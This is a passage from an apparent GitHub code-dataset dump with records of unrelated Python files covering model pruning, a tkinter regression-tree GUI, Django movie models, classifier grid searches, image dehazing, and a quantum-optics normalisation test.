'sparsity': target_op_sparsity,\n 'ch_num': ch_num,\n 'improper_idx': improper_idx,\n 'latency': temp_latency,\n 'performance': performance,\n 'masks': masks\n }\n\n current_latency = temp_latency\n\n # save model weights\n pruner.export_model(self._tmp_model_path)\n\n# print('Relaunch app!')\n# time.sleep(60)\n improper_idx += 1\n\n if not best_op:\n# # decrease pruning step\n# self._sparsity_per_iteration *= 0.5\n# _logger.info(\"No more layers to prune, decrease pruning step to %s\", self._sparsity_per_iteration)\n# pruning_iteration = max_iter\n continue\n\n # Pick the best layer to prune, update iterative information\n # update config_list\n self._config_list_generated = self._update_config_list(\n self._config_list_generated, best_op['op_name'], best_op['sparsity'])\n\n # update weights parameters\n self._model_to_prune.load_state_dict(torch.load(self._tmp_model_path))\n print('Budget: {:>8.4f}, Current latency: {:>8.4f}'.format(budget, best_op['latency']))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Budget: {:>8.4f}, Current latency: {:>8.4f} \\n'.format(budget, best_op['latency']))\n\n # update mask of the chosen op\n for wrapper in self.get_modules_wrapper():\n if wrapper.name == best_op['op_name']:\n for k in best_op['masks']:\n setattr(wrapper, k, best_op['masks'][k])\n break\n\n file_object.write('Layer {} selected with {:4d} channels, latency {:>8.4f}, accuracy {:>8.4f} \\n'.format(best_op['op_name'], best_op['ch_num'], best_op['latency'], best_op['performance']))\n file_object.close()\n# current_sparsity = target_sparsity\n# _logger.info('Pruning iteration %d finished, current sparsity: %s', pruning_iteration, current_sparsity)\n _logger.info('Layer %s seleted with sparsity %s, performance after pruning & short term fine-tuning : %s', best_op['op_name'], best_op['sparsity'], best_op['performance'])\n pruning_iteration += 1\n next_additional_cut[best_op['improper_idx']] = 0\n\n self._final_performance = best_op['performance']\n\n # load weights parameters\n self.load_model_state_dict(torch.load(self._tmp_model_path))\n# os.remove(self._tmp_model_path)\n\n _logger.info('----------Compression finished--------------')\n _logger.info('config_list generated: %s', self._config_list_generated)\n _logger.info(\"Performance after pruning: %s\", self._final_performance)\n# _logger.info(\"Masked sparsity: %.6f\", current_sparsity)\n\n # save best config found and best performance\n with open(os.path.join(self._experiment_data_dir, 'search_result.json'), 'w') as jsonfile:\n json.dump({\n 'performance': self._final_performance,\n 'config_list': json.dumps(self._config_list_generated)\n }, jsonfile)\n\n _logger.info('search history and result saved to foler : %s', self._experiment_data_dir)\n\n return self.bound_model\n","repo_name":"taehokim20/CPrune","sub_path":"tutorials/frontend/nni/algorithms/compression/pytorch/pruning/original/net_adapt_pruner_ansor.py","file_name":"net_adapt_pruner_ansor.py","file_ext":"py","file_size_in_byte":38019,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"7559325812","text":"#coding=utf-8\r\n'''\r\nCreated on Aug 21, 2017\r\nTree-Based Regression Methods\r\n@author: Edgis\r\n'''\r\nfrom numpy import *\r\nfrom tkinter import *\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport regTrees\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\n\r\n\"\"\"\r\ndef reDraw(tolS, tolN):\r\n pass\r\n\r\ndef drawNewTree():\r\n pass\r\n\"\"\"\r\n\r\n\r\ndef reDraw(tolS, tolN):\r\n reDraw.f.clf() #清空之前的图像\r\n reDraw.a = reDraw.f.add_subplot(111)\r\n if chkBtnVar.get():\r\n if tolN <2:\r\n #构建模型树\r\n tolN = 2\r\n myTree = regTrees.createTree(reDraw.rawDat, regTrees.modelLeaf,regTrees.modelErr,(tolS,tolN))\r\n yHat = regTrees.createForeCast(myTree,reDraw.testDat,regTrees.modelTreeEval)\r\n else:\r\n #构建回归树\r\n myTree = regTrees.createTree(reDraw.rawDat,ops=(tolS,tolN))\r\n yHat = regTrees.createForeCast(myTree,reDraw.testDat)\r\n reDraw.a.scatter(reDraw.rawDat[:,0],reDraw.rawDat[:,1],s=5)\r\n reDraw.a.plot(reDraw.testDat, yHat, linewidth=2.0)\r\n reDraw.canvas.show()\r\n\r\n\r\ndef getInput():\r\n try:\r\n tolN = int(tolNentry.get())\r\n except:\r\n tolN = 10\r\n print(\"enter Integer for tolN\")\r\n #清除错误的输入,用默认值代替\r\n tolNentry.delete(0, END)\r\n tolNentry.insert(0,'10')\r\n try:\r\n tolS = float(tolNentry.get())\r\n except:\r\n tolS = 1.0\r\n print(\"enter Float for tolS\")\r\n tolNentry.delete(0,END)\r\n tolNentry.insert(0,'1.0')\r\n return tolN, tolS\r\n\r\ndef drawNewTree():\r\n tolN, tolS = getInput()\r\n reDraw(tolS ,tolN)\r\n\r\n\r\nroot = Tk()\r\n\r\nLabel(root, text ='Plot Place Holder').grid(row=0,columnspan=3)\r\n\r\nLabel(root, text='tolN').grid(row = 1, column=0)\r\ntolNentry = Entry(root)\r\ntolNentry.grid(row=1,column=1)\r\ntolNentry.insert(0,'10')\r\nLabel(root,text='tolS').grid(row=2,column=0)\r\ntolNentry = Entry(root)\r\ntolNentry.grid(row=2,column=1)\r\ntolNentry.insert(0,'1.0')\r\nButton(root,text='ReDraw',command=drawNewTree).grid(row =1, column=2, rowspan=3)\r\nchkBtnVar = IntVar()\r\nchkBtn = Checkbutton(root, text='Model Tree',variable = chkBtnVar) #复选框\r\nchkBtn.grid(row=3,column=0,columnspan=2)\r\n\r\nreDraw.rawDat = mat(regTrees.loadDataSet('sine.txt'))\r\nreDraw.testDat = arange(min(reDraw.rawDat[:,0]), max(reDraw.rawDat[:,0]), 0.01)\r\n\r\nreDraw.f = Figure(figsize=(5,4),dpi=100)\r\nreDraw.canvas = FigureCanvasTkAgg(reDraw.f, master=root)\r\nreDraw.canvas.show()\r\nreDraw.canvas.get_tk_widget().grid(row = 0,columnspan=3)\r\n\r\n#reDraw(1.0,10)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"Edgis/Machine-learning-in-action","sub_path":"treeExplore.py","file_name":"treeExplore.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26507674605","text":"from django.db import models\nfrom django.conf import settings\n\n\n########################################################\nclass Genre(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return f\"{self.name}\"\n\n########################################################\nclass Movie(models.Model):\n title = models.CharField(max_length=50)\n overview = models.TextField()\n poster_path = models.TextField()\n release_date = models.CharField(max_length=50)\n vote_average = models.FloatField()\n tagline = models.TextField(blank=True)\n revenue = models.FloatField()\n genre = models.ManyToManyField(Genre)\n ours_vote = models.FloatField(default=0)\n vote_count = models.IntegerField(default=0)\n\n def __str__(self):\n return f\"{self.title}\"\n \n\n########################################################\nclass Review(models.Model):\n vote = models.FloatField()\n content = models.TextField(blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updateed_at = models.DateTimeField(auto_now=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"myreviews\")\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n # 리뷰 작성자 이름 게시하기 위해서 field작성 (인식)\n\n\n########################################################\nclass Comment(models.Model):\n content = models.TextField()\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n review = models.ForeignKey(Review, on_delete=models.CASCADE)\n\n\n########################################################\nclass stillcut(models.Model):\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n img_url = models.TextField()\n\n########################################################\nclass youtube_key(models.Model):\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n key = models.CharField(max_length=20)\n\n\n########################################################\n\n\n\n \n\n","repo_name":"PassionSoftIan/Orbit_Project","sub_path":"final-pjt-back/back/movies/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4487568730","text":"res = {}\ndef __init__(self, db):\n self.db = db\ndef compute(db):\n from scipy.io import arff\n\n import pandas as pd\n\n data = arff.loadarff(db)\n\n df = pd.DataFrame(data[0])\n X = df.iloc[:, :-1].values\n Y_data = df.iloc[:, -1].values\n from sklearn.preprocessing import MultiLabelBinarizer\n from sklearn.preprocessing import LabelEncoder\n lb_make = LabelEncoder()\n y = lb_make.fit_transform(Y_data)\n # y = MultiLabelBinarizer().fit_transform(Y_data)\n from sklearn.tree import DecisionTreeClassifier\n tree_clf = DecisionTreeClassifier()\n # Feature Engineering\n\n # 1.Imputation\n from sklearn.impute import SimpleImputer\n\n X_copy = df.iloc[:, :-1].copy()\n\n imputer = SimpleImputer(strategy=\"median\")\n\n imputer.fit(X_copy)\n\n new_X = imputer.transform(X_copy)\n\n new_X_df = pd.DataFrame(new_X, columns=X_copy.columns, index=X_copy.index)\n # Scaling Standarization\n from sklearn import preprocessing\n scaler = preprocessing.StandardScaler().fit(new_X)\n new_X = scaler.transform(new_X)\n\n # Feature selection, removing features with low variance¶\n from sklearn.feature_selection import VarianceThreshold\n sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n new_X = sel.fit_transform(new_X)\n # Training\n from sklearn.model_selection import train_test_split\n\n X_train, X_test, y_train, y_test = train_test_split(new_X, y, test_size=0.15, random_state=42)\n from sklearn.model_selection import cross_val_score\n\n # grid search DT\n from sklearn.model_selection import GridSearchCV\n\n import numpy as np\n\n depths = np.arange(1, 11)\n\n num_leafs = [1, 5, 10, 20, 50]\n\n param_grid = {'criterion': ['gini', 'entropy'], 'max_depth': depths, 'min_samples_leaf': num_leafs}\n\n new_tree_clf = DecisionTreeClassifier()\n\n grid_search_acc = GridSearchCV(new_tree_clf, param_grid, cv=10, scoring=\"accuracy\", return_train_score=True)\n grid_search_acc.fit(X_train, y_train)\n grid_search_f1 = GridSearchCV(new_tree_clf, param_grid, cv=10, scoring=\"f1_micro\", return_train_score=True)\n grid_search_f1.fit(X_train, y_train)\n # evaluation\n from sklearn.metrics import accuracy_score\n\n best_model_acc = grid_search_acc.best_estimator_\n best_model_f1 = grid_search_f1.best_estimator_\n tree_clf.fit(X_train, y_train)\n\n # Train and Test accuracy\n dt_train_acc = accuracy_score(y_train, best_model_acc.predict(X_train))\n dt_test_acc = accuracy_score(y_test, best_model_acc.predict(X_test))\n dt_train_f1 = accuracy_score(y_train, best_model_f1.predict(X_train))\n dt_test_f1 = accuracy_score(y_test, best_model_f1.predict(X_test))\n\n res = {}\n res[db+\"_decision_tree_train_acc\"] = dt_train_acc\n res[db+\"_decision_tree_test_acc\"] = dt_test_acc\n res[db+\"_decision_tree_train_f1\"] = dt_train_f1\n res[db+\"_decision_tree_test_f1\"] = dt_test_f1\n # Grid Search RF\n from sklearn.ensemble import RandomForestClassifier\n\n rf_param_grid = {\n 'n_estimators': [20, 40, 60, 80, 100],\n 'max_depth': [2, 5, 7],\n 'min_samples_leaf': [1, 2, 4]}\n rf = RandomForestClassifier()\n rf_grid_search_acc = GridSearchCV(rf, rf_param_grid, cv=3, scoring=\"accuracy\", return_train_score=True)\n rf_grid_search_acc.fit(X_train, y_train)\n rf_grid_search_f1 = GridSearchCV(rf, rf_param_grid, cv=3, scoring=\"f1_micro\", return_train_score=True)\n rf_grid_search_f1.fit(X_train, y_train)\n # Evaluation\n rf_best_model_acc = rf_grid_search_acc.best_estimator_\n rf_best_model_f1 = rf_grid_search_f1.best_estimator_\n rf_train_acc = accuracy_score(y_train, rf_best_model_acc.predict(X_train))\n rf_test_acc = accuracy_score(y_test, rf_best_model_acc.predict(X_test))\n rf_train_f1 = accuracy_score(y_train, rf_best_model_f1.predict(X_train))\n rf_test_f1 = accuracy_score(y_test, rf_best_model_f1.predict(X_test))\n res[db+\"_random_forest_train_acc\"] = rf_train_acc\n res[db+\"_random_forest_test_acc\"] = rf_test_acc\n res[db+\"_random_forest_train_f1\"] = rf_train_f1\n res[db+\"_random_forest_test_f1\"] = rf_test_f1\n # CV Grid Search\n from sklearn.naive_bayes import GaussianNB\n nb = GaussianNB()\n nb_params = {}\n nb_grid_search_acc = GridSearchCV(nb, nb_params, cv=3, scoring=\"accuracy\", return_train_score=True)\n nb_grid_search_f1 = GridSearchCV(nb, nb_params, cv=3, scoring=\"f1_micro\", return_train_score=True)\n nb_grid_search_acc.fit(X_train, y_train)\n nb_grid_search_f1.fit(X_train, y_train)\n nb_best_model_acc = nb_grid_search_acc.best_estimator_\n nb_best_model_f1 = nb_grid_search_f1.best_estimator_\n nb_train_acc = accuracy_score(y_train, nb_best_model_acc.predict(X_train))\n nb_test_acc = accuracy_score(y_test, nb_best_model_acc.predict(X_test))\n nb_train_f1 = accuracy_score(y_train, nb_best_model_f1.predict(X_train))\n nb_test_f1 = accuracy_score(y_test, nb_best_model_f1.predict(X_test))\n res[db+\"_naive_bayes_train_acc\"] = nb_train_acc\n res[db+\"_naive_bayes_test_acc\"] = nb_test_acc\n res[db+\"_naive_bayes_train_f1\"] = nb_train_f1\n res[db+\"_naive_bayes_test_f1\"] = nb_test_f1\n # SVC Grid Search\n # linear\n from sklearn import svm\n linear = svm.SVC(kernel='linear')\n parameters = {'C': [1, 10]}\n linear_grid_search_acc = GridSearchCV(linear, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n linear_grid_search_f1 = GridSearchCV(linear, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n linear_grid_search_acc.fit(X_train, y_train)\n linear_grid_search_f1.fit(X_train, y_train)\n linear_best_model_acc = linear_grid_search_acc.best_estimator_\n linear_best_model_f1 = linear_grid_search_f1.best_estimator_\n linear_train_acc = accuracy_score(y_train, linear_best_model_acc.predict(X_train))\n linear_test_acc = accuracy_score(y_test, linear_best_model_acc.predict(X_test))\n linear_train_f1 = accuracy_score(y_train, linear_best_model_f1.predict(X_train))\n linear_test_f1 = accuracy_score(y_test, linear_best_model_f1.predict(X_test))\n res[db+\"_svc_linear_train_acc\"] = linear_train_acc\n res[db+\"_svc_linear_test_acc\"] = linear_test_acc\n res[db+\"_svc_linear_train_f1\"] = linear_train_f1\n res[db+\"_svc_linear_test_f1\"] = linear_test_f1\n # polynomial\n poly = svm.SVC(kernel='poly')\n parameters = {'C': [1, 10]}\n poly_grid_search_acc = GridSearchCV(poly, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n poly_grid_search_f1 = GridSearchCV(poly, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n poly_grid_search_acc.fit(X_train, y_train)\n poly_grid_search_f1.fit(X_train, y_train)\n poly_best_model_acc = poly_grid_search_acc.best_estimator_\n poly_best_model_f1 = poly_grid_search_f1.best_estimator_\n poly_train_acc = accuracy_score(y_train, poly_best_model_acc.predict(X_train))\n poly_test_acc = accuracy_score(y_test, poly_best_model_acc.predict(X_test))\n poly_train_f1 = accuracy_score(y_train, poly_best_model_f1.predict(X_train))\n poly_test_f1 = accuracy_score(y_test, poly_best_model_f1.predict(X_test))\n res[db+\"_svc_poly_train_acc\"] = poly_train_acc\n res[db+\"_svc_poly_test_acc\"] = poly_test_acc\n res[db+\"_svc_polytrain_f1\"] = poly_train_f1\n res[db+\"_svc_poly_test_f1\"] = poly_test_f1\n # rbf\n rbf = svm.SVC(kernel='rbf')\n parameters = {'C': [1, 10]}\n rbf_grid_search_acc = GridSearchCV(rbf, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n rbf_grid_search_f1 = GridSearchCV(rbf, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n rbf_grid_search_acc.fit(X_train, y_train)\n rbf_grid_search_f1.fit(X_train, y_train)\n rbf_best_model_acc = rbf_grid_search_acc.best_estimator_\n rbf_best_model_f1 = rbf_grid_search_f1.best_estimator_\n rbf_train_acc = accuracy_score(y_train, rbf_best_model_acc.predict(X_train))\n rbf_test_acc = accuracy_score(y_test, rbf_best_model_acc.predict(X_test))\n rbf_train_f1 = accuracy_score(y_train, rbf_best_model_f1.predict(X_train))\n rbf_test_f1 = accuracy_score(y_test, rbf_best_model_f1.predict(X_test))\n res[db+\"_svc_rbf_train_acc\"] = rbf_train_acc\n res[db+\"_svc_rbf_test_acc\"] = rbf_test_acc\n res[db+\"_svc_rbf_train_f1\"] = rbf_train_f1\n res[db+\"_svc_rbf_test_f1\"] = rbf_test_f1\n # sigmoid\n sigmoid = svm.SVC(kernel='sigmoid')\n parameters = {'C': [1, 10]}\n sigmoid_grid_search_acc = GridSearchCV(sigmoid, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n sigmoid_grid_search_f1 = GridSearchCV(sigmoid, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n sigmoid_grid_search_acc.fit(X_train, y_train)\n sigmoid_grid_search_f1.fit(X_train, y_train)\n sigmoid_best_model_acc = sigmoid_grid_search_acc.best_estimator_\n sigmoid_best_model_f1 = sigmoid_grid_search_f1.best_estimator_\n sigmoid_train_acc = accuracy_score(y_train, sigmoid_best_model_acc.predict(X_train))\n sigmoid_test_acc = accuracy_score(y_test, sigmoid_best_model_acc.predict(X_test))\n sigmoid_train_f1 = accuracy_score(y_train, sigmoid_best_model_f1.predict(X_train))\n sigmoid_test_f1 = accuracy_score(y_test, sigmoid_best_model_f1.predict(X_test))\n res[db+\"_svc_sigmoid_train_acc\"] = sigmoid_train_acc\n res[db+\"_svc_sigmoid_test_acc\"] = sigmoid_test_acc\n res[db+\"_svc_sigmoidtrain_f1\"] = sigmoid_train_f1\n res[db+\"_svc_sigmoid_test_f1\"] = sigmoid_test_f1\n\n # result\n return res\n\n\n","repo_name":"QiaoLin22/smell-detection-ml","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":9417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73494709481","text":"#!/usr/bin/python3\n'''\nSimple compare script\n'''\n\n\ndef validate(number: str) -> bool:\n '''Validate entered number string is valid number'''\n if number == '':\n print('Error: number is empty')\n return False\n try:\n int(number)\n except ValueError as exp:\n print('Error: ', exp)\n return False\n return True\n\n\ndef read_number(prefix: str) -> int:\n '''Read number from the prompt'''\n while True:\n prompt = 'Enter ' + prefix + ' > '\n resp = input(prompt)\n if not validate(resp):\n continue\n number = int(resp)\n break\n return number\n\n\ndef compare(a, b: int) -> (str, int):\n '''\n Compare two numbers\n It returns 1 if a > b,\n returns 0 if a == b,\n returns -1 if a < b,\n returns 255 if unknown error\n '''\n if a > b:\n return '>', 1\n elif a == b:\n return '==', 0\n elif a < b:\n return '<', -1\n return 'Unknown error', 255\n\n\ndef introduction():\n '''Display introduction with example'''\n _, example1 = compare(5, 2)\n _, example2 = compare(2, 5)\n _, example3 = compare(3, 3)\n print('''\nPlease input two numbers. They will be compared and return a number.\n\nExample:\na > b is {}\na < b is {}\na == b is {}\n \n '''.format(example1, example2, example3))\n\n\ndef main():\n '''Read numbers from user input, then compare them, and return result'''\n introduction()\n first = read_number('a')\n second = read_number('b')\n result_str, result_int = compare(first, second)\n if result_int == 255:\n print(result_str)\n return\n print('Result: {} {} {} is {}'.format(first, result_str, second,\n result_int))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BrightAdeGodson/submissions","sub_path":"CS1101/bool.py","file_name":"bool.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11296327266","text":"from diffusers import DiffusionPipeline\n\npipeline = DiffusionPipeline.from_pretrained(\"{{model_path}}\")\n\n# self,\n# prompt: Union[str, List[str]] = None,\n# image: Union[torch.FloatTensor, PIL.Image.Image] = None,\n# mask_image: Union[torch.FloatTensor, PIL.Image.Image] = None,\n# strength: float = 0.8,\n# num_inference_steps: Optional[int] = 50,\n# guidance_scale: Optional[float] = 7.5,\n# negative_prompt: Optional[Union[str, List[str]]] = None,\n# num_images_per_prompt: Optional[int] = 1,\n# add_predicted_noise: Optional[bool] = False,\n# eta: Optional[float] = 0.0,\n# generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n# prompt_embeds: Optional[torch.FloatTensor] = None,\n# negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n# output_type: Optional[str] = \"pil\",\n# return_dict: bool = True,\n# callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n# callback_steps: int = 1,\n\nimages = pipeline(\n prompt=\"{{prompts}}\",\n negative_prompt=\"{{negative_prompt}}\",\n num_inference_steps={{steps}},\n num_images_per_prompt={{batch_size}},\n).images\n\nfor i in range(len(images)):\n images[i].save(\"{{workspace_path}}/outputs/image_%d.png\" % (i))\n","repo_name":"rrkeji/rrai-desktop-sdk","sub_path":"plugins/tauri-plugin-rrai-ability/src/abilities/stable_diffusion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35751181651","text":"matrix = [[int(input(f\"Número de [{n}x{num}]: \")) for num in range(3)] for n in range(3)]\nind = len(matrix)\nfor line in matrix:\n ind -= 1\n for n, col in enumerate(line):\n if n >= ind:\n print(col, end=\" \")\n else:\n print(\" \", end=\" \")\n print(\"\")\n","repo_name":"LBarros77/Python","sub_path":"exercices/questao03.py","file_name":"questao03.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10474050749","text":"import csv, spacy, os, sys,csv, nltk, re, pickle, html\nsys.path.append(\"/home/abravo/PycharmProjects/IberLEF2019\")\n\nimport xml.etree.ElementTree as ET\nfrom random import shuffle\n\nfrom spacymoji import Emoji\nimport numpy as np\n\nfrom utils.utils import preprocess_tweet, get_word_index, write_word_index, save_obj, load_obj, get_embedding_matrix, \\\n get_spacy_nlp, get_task_data_for_class_task, EMBEDDING_CHAR, create_data_comb, get_task_data_for_class_task_haha\n\n\ndef train2txt(train_path, output_path):\n\n ofile = open(output_path, \"w\")\n\n with open(train_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n row[1] = row[1].replace(\"\\n\", \" \")\n ofile.write(\"\\t\".join(row) + \"\\n\")\n\n ofile.close()\n\n\n\nif __name__ == '__main__':\n\n train_path = \"/home/upf/corpora/IberLEF2019/HAHA/haha_2019_train.csv\"\n\n output_path = \"/home/upf/corpora/IberLEF2019/HAHA/preprocessed_data\"\n\n preproc_train_path = os.path.join(output_path, \"haha_2019_train.txt\")\n\n #train2txt(train_path, preproc_train_path)\n\n test_path = \"/home/upf/corpora/IberLEF2019/HAHA/haha_2019_test.csv\"\n\n preproc_test_path = os.path.join(output_path, \"haha_2019_test.txt\")\n\n #train2txt(test_path, preproc_test_path)\n\n\n\n comb_path = os.path.join(output_path, \"haha_2019_train_test.txt\")\n #create_data_comb([preproc_train_path, preproc_test_path], True, comb_path)\n\n\n SAVE_WORD_INDEX = False\n SAVE_CHAR_INDEX = False\n SAVE_EMB_MATRIX = False\n SAVE_DATA = True\n SAVE_CHAR_DATA = False\n\n nlp = None\n\n tweet_col= 1\n label_col= 2\n\n\n\n if SAVE_WORD_INDEX:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n all_files = [preproc_train_path, preproc_test_path]\n\n word_index = get_word_index(nlp, all_files, True, 1)\n word_index_all_path = os.path.join(output_path, \"word_index_all.txt\")\n write_word_index(word_index, word_index_all_path)\n\n word_index_all_path = os.path.join(output_path, \"word_index_all.pkl\")\n save_obj(word_index, word_index_all_path)\n\n word_index_path = os.path.join(output_path, \"word_index_all.pkl\")\n word_index = load_obj(word_index_path)\n\n\n\n if SAVE_CHAR_INDEX:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n all_files = [preproc_train_path]\n\n char_index = get_word_index(nlp, all_files, True, tweet_col, True)\n char_index_all_path = os.path.join(output_path, \"char_index_train.txt\")\n write_word_index(char_index, char_index_all_path)\n char_index_all_path = os.path.join(output_path, \"char_index_train.pkl\")\n save_obj(char_index, char_index_all_path)\n print(\"CHAR INDEX PROCESSED!\")\n\n #char_index_path = os.path.join(output_path, \"char_index_train.pkl\")\n #char_index = load_obj(char_index_path)\n\n\n if SAVE_DATA:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n data, labels, scores = get_task_data_for_class_task_haha(nlp, word_index, preproc_train_path, True, True, tweet_col, [2,-1], False)\n data_path = os.path.join(output_path, \"data_train.pkl\")\n labels_path = os.path.join(output_path, \"labels_train.pkl\")\n scores_path = os.path.join(output_path, \"scores_train.pkl\")\n save_obj(data, data_path)\n save_obj(labels, labels_path)\n save_obj(scores, scores_path)\n\n data, labels, scores = get_task_data_for_class_task_haha(nlp, word_index, preproc_test_path, True, False, tweet_col,\n None, False)\n data_path = os.path.join(output_path, \"data_test.pkl\")\n save_obj(data, data_path)\n\n\n if SAVE_CHAR_DATA:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n data, labels = get_task_data_for_class_task(nlp, char_index, preproc_train_path, True, True, tweet_col, label_col, True)\n data_path = os.path.join(output_path, \"char_data_train.pkl\")\n save_obj(data, data_path)\n","repo_name":"abravo84/IberLEF2019","sub_path":"HAHA/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10655959314","text":"import torch\r\nimport torchvision\r\nimport torch.optim\r\nimport wave_u_net as model\r\nimport numpy as np\r\nimport torch.nn as nn\r\nfrom PIL import Image\r\nimport glob\r\nimport time,os\r\n\r\n\r\ndef dehaze_image( image_depth_path,image_hazy_path,Id,spath,pth_path):\r\n\r\n print(image_hazy_path,image_depth_path)\r\n img_hazy = Image.open(image_hazy_path)\r\n img_depth = Image.open(image_depth_path)\r\n\r\n img_hazy = img_hazy.resize((640,480), Image.ANTIALIAS)\r\n\r\n img_depth = img_depth.resize((640,480), Image.ANTIALIAS)\r\n\r\n\r\n img_hazy = (np.asarray(img_hazy) / 255.0)\r\n\r\n img_depth = (np.asarray(img_depth) / 255.0)\r\n\r\n img_hazy = torch.from_numpy(img_hazy).float().permute(2, 0, 1).cuda().unsqueeze(0)\r\n img_depth = torch.from_numpy(img_depth).float().cuda().unsqueeze(0).unsqueeze(0)\r\n \r\n dehaze_net = model.LAST_U_net()\r\n dehaze_net = nn.DataParallel(dehaze_net).cuda()\r\n\r\n dehaze_net.load_state_dict(torch.load(pth_path))\r\n \r\n clean_image = dehaze_net(img_depth,img_hazy)\r\n\r\n temp_tensor = (clean_image,0)\r\n index = image_depth_path.split('/')[-1]\r\n \r\n #torchvision.utils.save_image(torch.cat((img_hazy,clean_image),0), \"test_result/real/%s/%s\" % (s,index))\r\n\r\n torchvision.utils.save_image(clean_image, \"test_result/outdoor/%s/%s\" % (spath,index))\r\n\r\nif __name__ == '__main__':\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n spath = 'outdoor'\r\n pth_path = \"'/home/amax/share/FGD/U-Net/trained_model/outdoor/MCDN.pth'\"\r\n depth_list = glob.glob(r\"dataset/test set/%s/depth/*\" % spath)\r\n hazy_list = glob.glob(r\"dataset/test set/%s/hazy/*\" % spath)\r\n\r\n for Id in range(len(depth_list)):\r\n dehaze_image(depth_list[Id],hazy_list[Id],Id,spath,pth_pth)\r\n print(depth_list[Id], \"done!\")\r\n \r\n","repo_name":"CCECfgd/MSCDN-master","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"24348139918","text":"import random\n\ntext_str = input(\"Type the text to be scrambled and hit enter:\")\nprint(text_str)\n\n#split string by the space character into a list\nlist = text_str.split()\ntype(list)\n\n#iterate over all words in the list and scramble each of them\n#don't forget to check for punctuation marks\ni=0\nj=0\nlength=0\ntemp1=0\ntemp2=0\nnew=0\nswitch=0\n\nresult = \"\"\n\n#Goes through each word in the list\nwhile j < len(list):\n i = list[j]\n temp1 = i[0]\n p=len(i)\n p=p-1\n temp2 = i[p]\n ''.join(random.sample(i, len(i)))\n #scrambles up the word\n while len(i) >= length:\n if i[length] == temp1:\n switch = i[0]\n i[0] = temp1\n i[length] = switch\n if i[length] == temp2:\n switch = i[p]\n i[p] = temp2\n i[length] = switch\n print(i)\n length = length + 1\n\n j=j+1\n\n#print new list with scrambled words\n\n","repo_name":"c18441084/Python","sub_path":"scrambleletters.py","file_name":"scrambleletters.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28835525288","text":"# Runs test to check if input states are normalised\nimport numpy as np\nimport strawberryfields as sf\nimport tensorflow as tf\nfrom strawberryfields.ops import Sgate, Dgate, Vgate\n\ndef test_truncations(states, truncations=[10, 15, 20]):\n batch_size = states.shape[0]\n\n x = tf.placeholder(tf.complex64, shape=[batch_size, 3])\n\n eng, q = sf.Engine(1)\n with eng:\n Sgate(x[:, 0]) | q[0]\n Dgate(x[:, 1]) | q[0]\n Vgate(x[:, 2]) | q[0]\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n traces = np.zeros([batch_size, len(truncations)])\n for n in range(len(truncations)):\n state = eng.run('tf', eval=False, batch_size=batch_size, cutoff_dim=truncations[n])\n trace = tf.real(state.trace())\n\n traces[:, n] = sess.run(trace, feed_dict={\n x: states\n })\n print(\"Evaluated T={}\".format(truncations[n]))\n\n import matplotlib.pyplot as plt\n for n in range(len(truncations)):\n plt.subplot(len(truncations), 1, n+1)\n plt.hist(traces[:, n], bins=25)\n plt.xlabel(\"Trace\")\n 